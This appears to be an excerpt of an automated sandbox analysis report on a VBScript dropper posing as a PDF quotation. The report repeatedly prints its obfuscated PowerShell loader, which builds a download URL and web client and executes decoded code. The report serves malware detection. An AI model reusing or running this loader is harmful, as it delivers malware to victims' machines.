      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndJump to behavior
      Source: Urgent Quotation Notification_pdf.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5548
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5548Jump to behavior
      Source: classification engineClassification label: mal88.expl.evad.winVBS@4/5@2/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Bumpenes.samJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jitc4mea.v5j.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.2635802751.000001D676AE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdbP source: powershell.exe, 00000002.00000002.2635802751.000001D676AB9000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("Powershell.exe", ""<#Cantharidating Desinficerer afgrdern", "", "", "0");
      Suspicious powershell command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo 